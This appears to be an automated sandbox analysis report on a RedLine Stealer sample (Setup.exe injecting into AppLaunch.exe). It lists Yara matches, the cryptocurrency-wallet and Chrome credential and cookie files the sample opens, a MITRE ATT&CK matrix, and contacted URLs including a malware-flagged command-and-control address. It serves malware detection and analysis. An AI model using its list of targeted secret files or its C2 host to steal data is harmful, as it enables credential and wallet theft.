                    Source: Yara matchFile source: 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.406792188.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6868, type: MEMORYSTR
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: AppLaunch.exe, 00000002.00000002.408509605.000000000759D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: Yara matchFile source: 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.408509605.000000000759D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6868, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.3.Setup.exe.560000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.351025860.0000000000562000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.406792188.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 6868, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation                    		Path Interception311
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Input Capture                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts2
                    Native API                    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Disable or Modify Tools                    		1
                    Input Capture                    		241
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		Exfiltration Over Bluetooth1
                    Non-Application Layer Protocol                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)241
                    Virtualization/Sandbox Evasion                    		Security Account Manager11
                    Process Discovery                    		SMB/Windows Admin Shares3
                    Data from Local System                    		Automated Exfiltration11
                    Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
                    Process Injection                    		NTDS241
                    Virtualization/Sandbox Evasion                    		Distributed Component Object Model1
                    Clipboard Data                    		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Remote System Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync134
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Setup.exe45%VirustotalBrowse
                    Setup.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id17Response0%URL Reputationsafe
                    94.142.138.4:80100%Avira URL Cloudmalware
                    94.142.138.4:8018%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknownfalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    94.142.138.4:80true
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ns.adobe.c/gAppLaunch.exe, 00000002.00000003.406634921.0000000014294000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.406524312.0000000014281000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.406581263.0000000014290000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id9AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id8AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id5AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id4AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id7AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id6AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultpAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.ip.sb/ipAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id20AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://tempuri.org/Entity/Id21AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://tempuri.org/Entity/Id22AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id10AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://tempuri.org/Entity/Id11AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://tempuri.org/Entity/Id12AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://tempuri.org/Entity/Id13AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://tempuri.org/Entity/Id14AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://tempuri.org/Entity/Id15AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://tempuri.org/Entity/Id16AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id17AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id18AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id19AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
